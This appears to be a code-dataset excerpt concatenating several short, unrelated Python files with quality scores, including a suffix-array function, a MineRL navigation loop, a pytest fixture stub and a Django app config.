config = yaml.load(ycf, Loader=yaml.FullLoader)
environment = os.environ.get('ENVIRONMENT')
@pytest.fixture(scope="function")
def setup_wb():
wb = weather_butler.WeatherButler('db/weatherman_unit')
return wb
# def test_get_response():
# def test_format_request_city_id_list():
# def test_format_response():
# def test_poll():
| 2.375 | 2 |
Bioinformatics VI/Week II/SuffixArray.py | egeulgen/Bioinformatics_Specialization | 3 | 12799147 | <gh_stars>1-10
import sys
def SuffixArray(Text):
''' Suffix Array
Input: A string Text.
Output: SuffixArray(Text).
'''
suffixes = []
suffix_array = []
for i in range(len(Text)):
suffixes.append(Text[i:])
suffix_array.append(i)
suffix_array = [x for _, x in sorted(zip(suffixes, suffix_array), key=lambda pair: pair[0])]
return suffix_array
if __name__ == "__main__":
Text = sys.stdin.read().rstrip()
suffix_array = SuffixArray(Text)
print(', '.join(str(x) for x in suffix_array)) | 3.4375 | 3 |
ppo/mineRL.py | icrdr/pytorch-playground | 0 | 12799148 | <gh_stars>0
import minerl
import gym
import logging
logging.basicConfig(level=logging.DEBUG)
env = gym.make('MineRLNavigateDense-v0')
print('v')
obs = env.reset()
done = False
net_reward = 0
while not done:
action = env.action_space.noop()
print(action)
action['camera'] = [0, 0.03 * obs["compassAngle"]]
action['back'] = 0
action['forward'] = 1
action['jump'] = 1
action['attack'] = 1
obs, reward, done, info = env.step(action)
env.render()
net_reward += reward
print("Total reward: ", net_reward)
| 2.28125 | 2 |
200914/04.lists.py | Floou/python-basics | 0 | 12799149 | <reponame>Floou/python-basics
say = 'всем привет!'
print(say) | 1.640625 | 2 |
BOCSite/boc/apps.py | dylodylo/Betting-Odds-Comparision | 2 | 12799150 | from django.apps import AppConfig
class BocConfig(AppConfig):
name = 'boc'
| 1.15625 | 1 |
Subsets and Splits